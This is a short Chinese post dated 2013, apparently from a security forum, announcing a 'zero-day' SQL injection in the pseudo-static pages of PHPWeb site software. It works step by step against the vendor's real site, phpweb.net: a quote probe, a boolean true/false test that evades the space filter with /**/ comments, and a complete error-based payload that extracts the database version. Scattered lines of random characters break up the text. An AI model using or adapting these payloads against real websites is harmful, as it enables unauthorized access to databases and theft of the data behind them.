phpweb伪静态页面注入0day

admin

phpweb所有的整站程序伪静态页面都存在sql注入
- c$ a1 f1 G/ V5 ]& j- Y  q+ ]
* |; h- S* v; T+ {! F: k主站：http://phpweb.net/
* _5 U# q' s1 W3 ~加’检测：
, Q  N, Q) m* z3 X* J$ p
http://www.phpweb.net/down/html/?772′.html
: x  T7 G, L& r; R! d9 |6 W
) x) N$ O: k  l' N! Q9 h出错
, ?) N. u# J" S+ }' V2 z存在注入。
* W* T/ t& |9 p/ V: p6 S7 {# y$ k不能用空格，只能用/*罗
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常

2 p0 m5 D+ [6 k$ i2 r) F5 I" `. Ihttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
8 ]/ l) M7 B# t; A0 N! e4 H爆数据库版本：

?
1
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
9 B% l. _+ r2 L更新日期: 2013-01-03 13:39:50